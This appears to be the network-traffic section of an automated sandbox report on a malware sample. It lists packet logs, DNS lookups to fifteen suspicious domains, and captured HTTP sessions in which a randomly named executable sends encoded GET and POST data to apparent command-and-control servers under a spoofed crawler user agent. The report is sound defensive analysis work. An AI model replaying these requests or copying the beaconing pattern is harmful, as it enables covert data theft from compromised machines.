Jul 8, 2024 07:22:44.839056969 CEST	49786	80	192.168.2.4	5.78.41.174
Jul 8, 2024 07:22:44.843923092 CEST	80	49786	5.78.41.174	192.168.2.4
Jul 8, 2024 07:22:44.843966961 CEST	80	49786	5.78.41.174	192.168.2.4
Jul 8, 2024 07:22:44.843976974 CEST	80	49786	5.78.41.174	192.168.2.4
Jul 8, 2024 07:22:44.844016075 CEST	49786	80	192.168.2.4	5.78.41.174
Jul 8, 2024 07:22:44.883352995 CEST	49786	80	192.168.2.4	5.78.41.174
Jul 8, 2024 07:22:44.929153919 CEST	80	49786	5.78.41.174	192.168.2.4
Jul 8, 2024 07:22:44.929169893 CEST	80	49786	5.78.41.174	192.168.2.4
Jul 8, 2024 07:22:44.929181099 CEST	80	49786	5.78.41.174	192.168.2.4
Jul 8, 2024 07:22:44.929258108 CEST	80	49786	5.78.41.174	192.168.2.4
Jul 8, 2024 07:22:44.929265976 CEST	49786	80	192.168.2.4	5.78.41.174
Jul 8, 2024 07:22:44.929318905 CEST	80	49786	5.78.41.174	192.168.2.4
Jul 8, 2024 07:22:44.929320097 CEST	49786	80	192.168.2.4	5.78.41.174
Jul 8, 2024 07:22:44.929330111 CEST	80	49786	5.78.41.174	192.168.2.4
Jul 8, 2024 07:22:44.929415941 CEST	49786	80	192.168.2.4	5.78.41.174
Jul 8, 2024 07:22:44.929557085 CEST	80	49786	5.78.41.174	192.168.2.4
Jul 8, 2024 07:22:44.929640055 CEST	49786	80	192.168.2.4	5.78.41.174
Jul 8, 2024 07:22:45.291691065 CEST	49786	80	192.168.2.4	5.78.41.174
Jul 8, 2024 07:22:46.310889006 CEST	49787	80	192.168.2.4	5.78.41.174
Jul 8, 2024 07:22:46.315838099 CEST	80	49787	5.78.41.174	192.168.2.4
Jul 8, 2024 07:22:46.315901995 CEST	49787	80	192.168.2.4	5.78.41.174
Jul 8, 2024 07:22:46.318861008 CEST	49787	80	192.168.2.4	5.78.41.174
Jul 8, 2024 07:22:46.323733091 CEST	80	49787	5.78.41.174	192.168.2.4
Jul 8, 2024 07:22:47.332462072 CEST	80	49787	5.78.41.174	192.168.2.4
Jul 8, 2024 07:22:47.332488060 CEST	80	49787	5.78.41.174	192.168.2.4
Jul 8, 2024 07:22:47.332504988 CEST	80	49787	5.78.41.174	192.168.2.4
Jul 8, 2024 07:22:47.332519054 CEST	80	49787	5.78.41.174	192.168.2.4
Jul 8, 2024 07:22:47.332530022 CEST	80	49787	5.78.41.174	192.168.2.4
Jul 8, 2024 07:22:47.332541943 CEST	80	49787	5.78.41.174	192.168.2.4
Jul 8, 2024 07:22:47.332559109 CEST	80	49787	5.78.41.174	192.168.2.4
Jul 8, 2024 07:22:47.332564116 CEST	49787	80	192.168.2.4	5.78.41.174
Jul 8, 2024 07:22:47.332622051 CEST	49787	80	192.168.2.4	5.78.41.174
Jul 8, 2024 07:22:47.332672119 CEST	80	49787	5.78.41.174	192.168.2.4
Jul 8, 2024 07:22:47.332684040 CEST	80	49787	5.78.41.174	192.168.2.4
Jul 8, 2024 07:22:47.332695961 CEST	80	49787	5.78.41.174	192.168.2.4
Jul 8, 2024 07:22:47.332720995 CEST	49787	80	192.168.2.4	5.78.41.174
Jul 8, 2024 07:22:47.332746029 CEST	49787	80	192.168.2.4	5.78.41.174
Jul 8, 2024 07:22:47.337415934 CEST	80	49787	5.78.41.174	192.168.2.4
Jul 8, 2024 07:22:47.337482929 CEST	80	49787	5.78.41.174	192.168.2.4
Jul 8, 2024 07:22:47.337493896 CEST	80	49787	5.78.41.174	192.168.2.4
Jul 8, 2024 07:22:47.337538004 CEST	80	49787	5.78.41.174	192.168.2.4
Jul 8, 2024 07:22:47.337615967 CEST	49787	80	192.168.2.4	5.78.41.174
Jul 8, 2024 07:22:47.410610914 CEST	80	49787	5.78.41.174	192.168.2.4
Jul 8, 2024 07:22:47.418602943 CEST	80	49787	5.78.41.174	192.168.2.4
Jul 8, 2024 07:22:47.418636084 CEST	80	49787	5.78.41.174	192.168.2.4
Jul 8, 2024 07:22:47.418648005 CEST	80	49787	5.78.41.174	192.168.2.4
Jul 8, 2024 07:22:47.418664932 CEST	49787	80	192.168.2.4	5.78.41.174
Jul 8, 2024 07:22:47.418723106 CEST	49787	80	192.168.2.4	5.78.41.174
Jul 8, 2024 07:22:47.418740988 CEST	80	49787	5.78.41.174	192.168.2.4
Jul 8, 2024 07:22:47.418754101 CEST	80	49787	5.78.41.174	192.168.2.4
Jul 8, 2024 07:22:47.418823004 CEST	49787	80	192.168.2.4	5.78.41.174
Jul 8, 2024 07:22:47.418940067 CEST	80	49787	5.78.41.174	192.168.2.4
Jul 8, 2024 07:22:47.419812918 CEST	49787	80	192.168.2.4	5.78.41.174
Jul 8, 2024 07:22:47.823734999 CEST	49787	80	192.168.2.4	5.78.41.174
Jul 8, 2024 07:22:48.906495094 CEST	49788	80	192.168.2.4	5.78.41.174
Jul 8, 2024 07:22:48.911616087 CEST	80	49788	5.78.41.174	192.168.2.4
Jul 8, 2024 07:22:48.911699057 CEST	49788	80	192.168.2.4	5.78.41.174
Jul 8, 2024 07:22:48.921534061 CEST	49788	80	192.168.2.4	5.78.41.174
Jul 8, 2024 07:22:48.926561117 CEST	80	49788	5.78.41.174	192.168.2.4
Jul 8, 2024 07:22:48.926577091 CEST	80	49788	5.78.41.174	192.168.2.4
Jul 8, 2024 07:22:48.926584959 CEST	80	49788	5.78.41.174	192.168.2.4
Jul 8, 2024 07:22:48.926595926 CEST	80	49788	5.78.41.174	192.168.2.4
Jul 8, 2024 07:22:48.926606894 CEST	80	49788	5.78.41.174	192.168.2.4
Jul 8, 2024 07:22:48.926651001 CEST	80	49788	5.78.41.174	192.168.2.4
Jul 8, 2024 07:22:48.926661015 CEST	80	49788	5.78.41.174	192.168.2.4
Jul 8, 2024 07:22:48.926680088 CEST	80	49788	5.78.41.174	192.168.2.4
Jul 8, 2024 07:22:48.926767111 CEST	80	49788	5.78.41.174	192.168.2.4
Jul 8, 2024 07:22:50.015275002 CEST	80	49788	5.78.41.174	192.168.2.4
Jul 8, 2024 07:22:50.015350103 CEST	80	49788	5.78.41.174	192.168.2.4
Jul 8, 2024 07:22:50.015362024 CEST	80	49788	5.78.41.174	192.168.2.4
Jul 8, 2024 07:22:50.015436888 CEST	80	49788	5.78.41.174	192.168.2.4
Jul 8, 2024 07:22:50.015453100 CEST	80	49788	5.78.41.174	192.168.2.4
Jul 8, 2024 07:22:50.015465021 CEST	80	49788	5.78.41.174	192.168.2.4
Jul 8, 2024 07:22:50.015477896 CEST	80	49788	5.78.41.174	192.168.2.4
Jul 8, 2024 07:22:50.015491009 CEST	49788	80	192.168.2.4	5.78.41.174
Jul 8, 2024 07:22:50.015516043 CEST	49788	80	192.168.2.4	5.78.41.174
Jul 8, 2024 07:22:50.015605927 CEST	80	49788	5.78.41.174	192.168.2.4
Jul 8, 2024 07:22:50.015616894 CEST	80	49788	5.78.41.174	192.168.2.4
Jul 8, 2024 07:22:50.015628099 CEST	80	49788	5.78.41.174	192.168.2.4
Jul 8, 2024 07:22:50.015650988 CEST	49788	80	192.168.2.4	5.78.41.174
Jul 8, 2024 07:22:50.015695095 CEST	49788	80	192.168.2.4	5.78.41.174
Jul 8, 2024 07:22:50.020275116 CEST	80	49788	5.78.41.174	192.168.2.4
Jul 8, 2024 07:22:50.020351887 CEST	80	49788	5.78.41.174	192.168.2.4
Jul 8, 2024 07:22:50.020360947 CEST	80	49788	5.78.41.174	192.168.2.4
Jul 8, 2024 07:22:50.020428896 CEST	49788	80	192.168.2.4	5.78.41.174
Jul 8, 2024 07:22:50.109579086 CEST	80	49788	5.78.41.174	192.168.2.4
Jul 8, 2024 07:22:50.109652996 CEST	80	49788	5.78.41.174	192.168.2.4
Jul 8, 2024 07:22:50.109663010 CEST	80	49788	5.78.41.174	192.168.2.4
Jul 8, 2024 07:22:50.109734058 CEST	80	49788	5.78.41.174	192.168.2.4
Jul 8, 2024 07:22:50.109738111 CEST	49788	80	192.168.2.4	5.78.41.174
Jul 8, 2024 07:22:50.109745979 CEST	80	49788	5.78.41.174	192.168.2.4
Jul 8, 2024 07:22:50.109755993 CEST	80	49788	5.78.41.174	192.168.2.4
Jul 8, 2024 07:22:50.109814882 CEST	49788	80	192.168.2.4	5.78.41.174
Jul 8, 2024 07:22:50.109814882 CEST	49788	80	192.168.2.4	5.78.41.174
Jul 8, 2024 07:22:50.430217981 CEST	49788	80	192.168.2.4	5.78.41.174
Jul 8, 2024 07:22:51.448792934 CEST	49789	80	192.168.2.4	5.78.41.174
Jul 8, 2024 07:22:51.453821898 CEST	80	49789	5.78.41.174	192.168.2.4
Jul 8, 2024 07:22:51.453984976 CEST	49789	80	192.168.2.4	5.78.41.174
Jul 8, 2024 07:22:51.457643032 CEST	49789	80	192.168.2.4	5.78.41.174
Jul 8, 2024 07:22:51.462462902 CEST	80	49789	5.78.41.174	192.168.2.4
Jul 8, 2024 07:22:52.289011002 CEST	80	49789	5.78.41.174	192.168.2.4
Jul 8, 2024 07:22:52.289027929 CEST	80	49789	5.78.41.174	192.168.2.4
Jul 8, 2024 07:22:52.289128065 CEST	49789	80	192.168.2.4	5.78.41.174
Jul 8, 2024 07:22:52.292150974 CEST	49789	80	192.168.2.4	5.78.41.174
Jul 8, 2024 07:22:52.297399998 CEST	80	49789	5.78.41.174	192.168.2.4
Jul 8, 2024 07:22:57.751040936 CEST	49790	80	192.168.2.4	64.46.102.70
Jul 8, 2024 07:22:57.755866051 CEST	80	49790	64.46.102.70	192.168.2.4
Jul 8, 2024 07:22:57.755942106 CEST	49790	80	192.168.2.4	64.46.102.70
Jul 8, 2024 07:22:57.761646986 CEST	49790	80	192.168.2.4	64.46.102.70
Jul 8, 2024 07:22:57.768569946 CEST	80	49790	64.46.102.70	192.168.2.4
Jul 8, 2024 07:22:58.218817949 CEST	80	49790	64.46.102.70	192.168.2.4
Jul 8, 2024 07:22:58.218981981 CEST	80	49790	64.46.102.70	192.168.2.4
Jul 8, 2024 07:22:58.219646931 CEST	49790	80	192.168.2.4	64.46.102.70
Jul 8, 2024 07:22:59.289654016 CEST	49790	80	192.168.2.4	64.46.102.70
Jul 8, 2024 07:23:00.309454918 CEST	49791	80	192.168.2.4	64.46.102.70
Jul 8, 2024 07:23:00.314448118 CEST	80	49791	64.46.102.70	192.168.2.4
Jul 8, 2024 07:23:00.314551115 CEST	49791	80	192.168.2.4	64.46.102.70
Jul 8, 2024 07:23:00.316860914 CEST	49791	80	192.168.2.4	64.46.102.70
Jul 8, 2024 07:23:00.321667910 CEST	80	49791	64.46.102.70	192.168.2.4
Jul 8, 2024 07:23:00.766094923 CEST	80	49791	64.46.102.70	192.168.2.4
Jul 8, 2024 07:23:00.766354084 CEST	80	49791	64.46.102.70	192.168.2.4
Jul 8, 2024 07:23:00.766434908 CEST	49791	80	192.168.2.4	64.46.102.70
Jul 8, 2024 07:23:02.196019888 CEST	49791	80	192.168.2.4	64.46.102.70

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 8, 2024 07:19:48.085367918 CEST	49595	53	192.168.2.4	1.1.1.1
Jul 8, 2024 07:19:48.190510035 CEST	53	49595	1.1.1.1	192.168.2.4
Jul 8, 2024 07:20:03.735768080 CEST	61927	53	192.168.2.4	1.1.1.1
Jul 8, 2024 07:20:04.234971046 CEST	53	61927	1.1.1.1	192.168.2.4
Jul 8, 2024 07:20:17.699737072 CEST	52999	53	192.168.2.4	1.1.1.1
Jul 8, 2024 07:20:17.753737926 CEST	53	52999	1.1.1.1	192.168.2.4
Jul 8, 2024 07:20:31.074202061 CEST	52951	53	192.168.2.4	1.1.1.1
Jul 8, 2024 07:20:31.101834059 CEST	53	52951	1.1.1.1	192.168.2.4
Jul 8, 2024 07:20:44.341785908 CEST	58928	53	192.168.2.4	1.1.1.1
Jul 8, 2024 07:20:44.356708050 CEST	53	58928	1.1.1.1	192.168.2.4
Jul 8, 2024 07:20:57.465653896 CEST	60761	53	192.168.2.4	1.1.1.1
Jul 8, 2024 07:20:57.478898048 CEST	53	60761	1.1.1.1	192.168.2.4
Jul 8, 2024 07:21:10.594122887 CEST	62141	53	192.168.2.4	1.1.1.1
Jul 8, 2024 07:21:10.608036041 CEST	53	62141	1.1.1.1	192.168.2.4
Jul 8, 2024 07:21:23.886668921 CEST	63696	53	192.168.2.4	1.1.1.1
Jul 8, 2024 07:21:23.900507927 CEST	53	63696	1.1.1.1	192.168.2.4
Jul 8, 2024 07:21:36.980467081 CEST	50728	53	192.168.2.4	1.1.1.1
Jul 8, 2024 07:21:36.994103909 CEST	53	50728	1.1.1.1	192.168.2.4
Jul 8, 2024 07:21:50.122186899 CEST	56495	53	192.168.2.4	1.1.1.1
Jul 8, 2024 07:21:50.242043018 CEST	53	56495	1.1.1.1	192.168.2.4
Jul 8, 2024 07:22:03.761646032 CEST	60485	53	192.168.2.4	1.1.1.1
Jul 8, 2024 07:22:03.782639027 CEST	53	60485	1.1.1.1	192.168.2.4
Jul 8, 2024 07:22:17.137206078 CEST	52878	53	192.168.2.4	1.1.1.1
Jul 8, 2024 07:22:17.154835939 CEST	53	52878	1.1.1.1	192.168.2.4
Jul 8, 2024 07:22:30.278568029 CEST	56283	53	192.168.2.4	1.1.1.1
Jul 8, 2024 07:22:30.290004015 CEST	53	56283	1.1.1.1	192.168.2.4
Jul 8, 2024 07:22:43.749655008 CEST	65128	53	192.168.2.4	1.1.1.1
Jul 8, 2024 07:22:43.763650894 CEST	53	65128	1.1.1.1	192.168.2.4
Jul 8, 2024 07:22:57.309639931 CEST	54769	53	192.168.2.4	1.1.1.1
Jul 8, 2024 07:22:57.748526096 CEST	53	54769	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 8, 2024 07:19:48.085367918 CEST	192.168.2.4	1.1.1.1	0xd6d9	Standard query (0)	www.yexz60.live	A (IP address)	IN (0x0001)	false
Jul 8, 2024 07:20:03.735768080 CEST	192.168.2.4	1.1.1.1	0xeddf	Standard query (0)	www.sodnavisystem.com	A (IP address)	IN (0x0001)	false
Jul 8, 2024 07:20:17.699737072 CEST	192.168.2.4	1.1.1.1	0xafd	Standard query (0)	www.gymroom.online	A (IP address)	IN (0x0001)	false
Jul 8, 2024 07:20:31.074202061 CEST	192.168.2.4	1.1.1.1	0x4a82	Standard query (0)	www.hectmalt.xyz	A (IP address)	IN (0x0001)	false
Jul 8, 2024 07:20:44.341785908 CEST	192.168.2.4	1.1.1.1	0x10b9	Standard query (0)	www.atlpicsstudios.com	A (IP address)	IN (0x0001)	false
Jul 8, 2024 07:20:57.465653896 CEST	192.168.2.4	1.1.1.1	0xc316	Standard query (0)	www.bearclaw.bot	A (IP address)	IN (0x0001)	false
Jul 8, 2024 07:21:10.594122887 CEST	192.168.2.4	1.1.1.1	0xe55c	Standard query (0)	www.noghteyab.com	A (IP address)	IN (0x0001)	false
Jul 8, 2024 07:21:23.886668921 CEST	192.168.2.4	1.1.1.1	0xf525	Standard query (0)	www.mcpcrecycling.com	A (IP address)	IN (0x0001)	false
Jul 8, 2024 07:21:36.980467081 CEST	192.168.2.4	1.1.1.1	0xe573	Standard query (0)	www.evoolihubs.shop	A (IP address)	IN (0x0001)	false
Jul 8, 2024 07:21:50.122186899 CEST	192.168.2.4	1.1.1.1	0xdb19	Standard query (0)	www.shaf-kupe-msk.store	A (IP address)	IN (0x0001)	false
Jul 8, 2024 07:22:03.761646032 CEST	192.168.2.4	1.1.1.1	0x5410	Standard query (0)	www.quixaclienti.com	A (IP address)	IN (0x0001)	false
Jul 8, 2024 07:22:17.137206078 CEST	192.168.2.4	1.1.1.1	0x3282	Standard query (0)	www.789bet1okvip.solutions	A (IP address)	IN (0x0001)	false
Jul 8, 2024 07:22:30.278568029 CEST	192.168.2.4	1.1.1.1	0x2041	Standard query (0)	www.334es.com	A (IP address)	IN (0x0001)	false
Jul 8, 2024 07:22:43.749655008 CEST	192.168.2.4	1.1.1.1	0x69c6	Standard query (0)	www.411divorce.com	A (IP address)	IN (0x0001)	false
Jul 8, 2024 07:22:57.309639931 CEST	192.168.2.4	1.1.1.1	0x6f6a	Standard query (0)	www.sgbet777.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 8, 2024 07:19:48.190510035 CEST	1.1.1.1	192.168.2.4	0xd6d9	No error (0)	www.yexz60.live	yexz60.live		CNAME (Canonical name)	IN (0x0001)	false
Jul 8, 2024 07:19:48.190510035 CEST	1.1.1.1	192.168.2.4	0xd6d9	No error (0)	yexz60.live		3.33.130.190	A (IP address)	IN (0x0001)	false
Jul 8, 2024 07:19:48.190510035 CEST	1.1.1.1	192.168.2.4	0xd6d9	No error (0)	yexz60.live		15.197.148.33	A (IP address)	IN (0x0001)	false
Jul 8, 2024 07:20:04.234971046 CEST	1.1.1.1	192.168.2.4	0xeddf	No error (0)	www.sodnavisystem.com		162.43.94.40	A (IP address)	IN (0x0001)	false
Jul 8, 2024 07:20:17.753737926 CEST	1.1.1.1	192.168.2.4	0xafd	No error (0)	www.gymroom.online		37.9.175.173	A (IP address)	IN (0x0001)	false
Jul 8, 2024 07:20:31.101834059 CEST	1.1.1.1	192.168.2.4	0x4a82	No error (0)	www.hectmalt.xyz		203.161.41.207	A (IP address)	IN (0x0001)	false
Jul 8, 2024 07:20:44.356708050 CEST	1.1.1.1	192.168.2.4	0x10b9	No error (0)	www.atlpicsstudios.com	atlpicsstudios.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 8, 2024 07:20:44.356708050 CEST	1.1.1.1	192.168.2.4	0x10b9	No error (0)	atlpicsstudios.com		3.33.130.190	A (IP address)	IN (0x0001)	false
Jul 8, 2024 07:20:44.356708050 CEST	1.1.1.1	192.168.2.4	0x10b9	No error (0)	atlpicsstudios.com		15.197.148.33	A (IP address)	IN (0x0001)	false
Jul 8, 2024 07:20:57.478898048 CEST	1.1.1.1	192.168.2.4	0xc316	No error (0)	www.bearclaw.bot	bearclaw.bot		CNAME (Canonical name)	IN (0x0001)	false
Jul 8, 2024 07:20:57.478898048 CEST	1.1.1.1	192.168.2.4	0xc316	No error (0)	bearclaw.bot		3.33.130.190	A (IP address)	IN (0x0001)	false
Jul 8, 2024 07:20:57.478898048 CEST	1.1.1.1	192.168.2.4	0xc316	No error (0)	bearclaw.bot		15.197.148.33	A (IP address)	IN (0x0001)	false
Jul 8, 2024 07:21:10.608036041 CEST	1.1.1.1	192.168.2.4	0xe55c	No error (0)	www.noghteyab.com		51.89.93.193	A (IP address)	IN (0x0001)	false
Jul 8, 2024 07:21:23.900507927 CEST	1.1.1.1	192.168.2.4	0xf525	No error (0)	www.mcpcrecycling.com	mcpcrecycling.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 8, 2024 07:21:23.900507927 CEST	1.1.1.1	192.168.2.4	0xf525	No error (0)	mcpcrecycling.com		3.33.130.190	A (IP address)	IN (0x0001)	false
Jul 8, 2024 07:21:23.900507927 CEST	1.1.1.1	192.168.2.4	0xf525	No error (0)	mcpcrecycling.com		15.197.148.33	A (IP address)	IN (0x0001)	false
Jul 8, 2024 07:21:36.994103909 CEST	1.1.1.1	192.168.2.4	0xe573	No error (0)	www.evoolihubs.shop		188.114.96.3	A (IP address)	IN (0x0001)	false
Jul 8, 2024 07:21:36.994103909 CEST	1.1.1.1	192.168.2.4	0xe573	No error (0)	www.evoolihubs.shop		188.114.97.3	A (IP address)	IN (0x0001)	false
Jul 8, 2024 07:21:50.242043018 CEST	1.1.1.1	192.168.2.4	0xdb19	No error (0)	www.shaf-kupe-msk.store		45.130.41.38	A (IP address)	IN (0x0001)	false
Jul 8, 2024 07:22:03.782639027 CEST	1.1.1.1	192.168.2.4	0x5410	No error (0)	www.quixaclienti.com	quixaclienti.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 8, 2024 07:22:03.782639027 CEST	1.1.1.1	192.168.2.4	0x5410	No error (0)	quixaclienti.com		3.33.130.190	A (IP address)	IN (0x0001)	false
Jul 8, 2024 07:22:03.782639027 CEST	1.1.1.1	192.168.2.4	0x5410	No error (0)	quixaclienti.com		15.197.148.33	A (IP address)	IN (0x0001)	false
Jul 8, 2024 07:22:17.154835939 CEST	1.1.1.1	192.168.2.4	0x3282	No error (0)	www.789bet1okvip.solutions	789bet1okvip.solutions		CNAME (Canonical name)	IN (0x0001)	false
Jul 8, 2024 07:22:17.154835939 CEST	1.1.1.1	192.168.2.4	0x3282	No error (0)	789bet1okvip.solutions		3.33.130.190	A (IP address)	IN (0x0001)	false
Jul 8, 2024 07:22:17.154835939 CEST	1.1.1.1	192.168.2.4	0x3282	No error (0)	789bet1okvip.solutions		15.197.148.33	A (IP address)	IN (0x0001)	false
Jul 8, 2024 07:22:30.290004015 CEST	1.1.1.1	192.168.2.4	0x2041	No error (0)	www.334es.com		103.176.91.154	A (IP address)	IN (0x0001)	false
Jul 8, 2024 07:22:43.763650894 CEST	1.1.1.1	192.168.2.4	0x69c6	No error (0)	www.411divorce.com	411divorce.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 8, 2024 07:22:43.763650894 CEST	1.1.1.1	192.168.2.4	0x69c6	No error (0)	411divorce.com		5.78.41.174	A (IP address)	IN (0x0001)	false
Jul 8, 2024 07:22:57.748526096 CEST	1.1.1.1	192.168.2.4	0x6f6a	No error (0)	www.sgbet777.org	sgbet777.org		CNAME (Canonical name)	IN (0x0001)	false
Jul 8, 2024 07:22:57.748526096 CEST	1.1.1.1	192.168.2.4	0x6f6a	No error (0)	sgbet777.org		64.46.102.70	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.yexz60.live

www.sodnavisystem.com

www.gymroom.online

www.hectmalt.xyz

www.atlpicsstudios.com

www.bearclaw.bot

www.noghteyab.com

www.mcpcrecycling.com

www.evoolihubs.shop

www.shaf-kupe-msk.store

www.quixaclienti.com

www.789bet1okvip.solutions

www.334es.com

www.411divorce.com

www.sgbet777.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49736	3.33.130.190	80	4584	C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe

Timestamp	Bytes transferred	Direction	Data
Jul 8, 2024 07:19:48.203264952 CEST	449	OUT	GET /b58q/?MdEl=9y3r5r666D9AuSqfLzxakfc3WeHGC1b3EkVcUHvxQ2YtNmYEvcMAxsdD5dSUMIh6vRZbYKiLrFXGiCp3Pe2iIz6r0aAJ1Bk1DmI4olH2PPKy4iCHNw8YI/w=&cv4D=Bv0xSH88iTF48zS0 HTTP/1.1 Host: www.yexz60.live Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
Jul 8, 2024 07:19:48.680001020 CEST	402	IN	HTTP/1.1 200 OK Server: openresty Date: Mon, 08 Jul 2024 05:19:48 GMT Content-Type: text/html Content-Length: 262 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 4d 64 45 6c 3d 39 79 33 72 35 72 36 36 36 44 39 41 75 53 71 66 4c 7a 78 61 6b 66 63 33 57 65 48 47 43 31 62 33 45 6b 56 63 55 48 76 78 51 32 59 74 4e 6d 59 45 76 63 4d 41 78 73 64 44 35 64 53 55 4d 49 68 36 76 52 5a 62 59 4b 69 4c 72 46 58 47 69 43 70 33 50 65 32 69 49 7a 36 72 30 61 41 4a 31 42 6b 31 44 6d 49 34 6f 6c 48 32 50 50 4b 79 34 69 43 48 4e 77 38 59 49 2f 77 3d 26 63 76 34 44 3d 42 76 30 78 53 48 38 38 69 54 46 34 38 7a 53 30 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?MdEl=9y3r5r666D9AuSqfLzxakfc3WeHGC1b3EkVcUHvxQ2YtNmYEvcMAxsdD5dSUMIh6vRZbYKiLrFXGiCp3Pe2iIz6r0aAJ1Bk1DmI4olH2PPKy4iCHNw8YI/w=&cv4D=Bv0xSH88iTF48zS0"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49738	162.43.94.40	80	4584	C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe

Timestamp	Bytes transferred	Direction	Data
Jul 8, 2024 07:20:04.244698048 CEST	723	OUT	POST /5mht/ HTTP/1.1 Host: www.sodnavisystem.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.sodnavisystem.com Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 201 Referer: http://www.sodnavisystem.com/5mht/ User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 4d 64 45 6c 3d 55 32 55 72 39 58 4b 7a 55 36 43 57 46 78 42 41 57 65 54 66 64 66 44 79 2b 78 48 77 49 48 4f 45 36 36 62 65 36 2b 51 63 76 73 53 55 75 55 68 6f 32 56 46 64 5a 62 76 7a 43 66 4e 2f 53 4e 47 61 5a 46 31 4e 53 49 45 64 51 4d 42 41 35 34 4d 48 70 30 63 38 56 68 70 48 49 62 78 48 70 47 43 34 36 57 66 78 37 57 34 2b 62 33 52 79 44 33 74 39 68 46 75 44 4c 64 67 53 54 57 43 71 51 56 41 48 2f 64 6c 4c 6b 79 6b 49 4b 6b 34 61 58 31 65 74 37 79 50 49 6d 70 42 50 4d 41 67 73 77 6d 44 6e 72 67 47 50 72 39 75 72 63 33 72 7a 30 2f 32 7a 7a 39 66 34 44 61 69 36 77 57 58 77 61 58 6b 35 6d 67 3d 3d Data Ascii: MdEl=U2Ur9XKzU6CWFxBAWeTfdfDy+xHwIHOE66be6+QcvsSUuUho2VFdZbvzCfN/SNGaZF1NSIEdQMBA54MHp0c8VhpHIbxHpGC46Wfx7W4+b3RyD3t9hFuDLdgSTWCqQVAH/dlLkykIKk4aX1et7yPImpBPMAgswmDnrgGPr9urc3rz0/2zz9f4Dai6wWXwaXk5mg==
Jul 8, 2024 07:20:05.051227093 CEST	1236	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 08 Jul 2024 05:19:52 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Last-Modified: Wed, 14 Feb 2024 05:54:19 GMT ETag: W/"afe-611512456e9bf" Content-Encoding: br Data Raw: 35 31 33 0d 0a c1 e8 57 00 00 bf bd a8 fb ce fd 7c bd 5d 84 c4 aa b8 8e 93 34 19 8e 63 21 75 ed 36 e8 d6 aa 63 6c 7c a1 b3 7d 89 8f 9d ef 2c fb 92 26 4c f9 fb 48 73 87 06 ad 58 b5 56 b4 a5 9d 8a e8 04 a5 b0 8e 81 5a 21 3e 3a 21 7e 68 57 7e 56 21 f1 af f9 eb e2 5c b3 06 cd c6 74 77 6f 61 0c c3 76 48 9f 6b b3 28 4b 4e b8 9f 30 c5 f0 c1 24 08 a2 45 b0 28 86 38 4d 82 86 0f 96 4f d0 52 2d 36 31 19 0c 06 53 4b aa 13 d9 81 5f 0e 9e 2b b8 b5 6d 9a 74 ea 5d 78 57 ae cf 4f 7f f4 c9 c2 0c c4 2a e1 3e f2 62 95 70 e0 44 74 5a f8 33 82 7d e4 c5 94 44 3e f2 12 aa 08 84 31 c9 72 aa 5a 78 e6 de b4 f5 c1 02 06 db 47 9e 62 8a 53 bf 56 ae c1 2c e3 14 ee 48 05 b3 b2 2b 22 cf 56 4c 71 ea 23 ff 4b 04 49 68 0b 87 32 1d 64 ac 13 2b 0c a1 14 8a 0a d5 c2 d3 e3 2f 80 07 77 67 16 3f 9e 59 84 5b 22 9c c4 f7 cc 4c 06 52 e5 e7 d2 5b 77 ae cf 3c 28 cd ce cf cd cd df 07 c3 a6 9a d7 63 74 29 95 d9 1e bf c4 22 15 b7 22 da 63 21 b5 06 be 50 62 82 29 46 b8 95 87 84 d3 96 33 59 2e 25 4c b0 a4 9b 8c de 16 fb c8 cb d5 80 53 50 83 94 b6 b0 [TRUNCATED] Data Ascii: 513W\|]4c!u6cl\|},&LHsXVZ!>:!~hW~V!\twoavHk(KN0$E(8MOR-61SK_+mt]xWO>bpDtZ3}D>1rZxGbSV,H+"VLq#KIh2d+/wg?Y["LR[w<(ct)""c!Pb)F3Y.%LSP}ey}4@B.geJQ"tL"M.rB&"G6K<$H\(V{A( 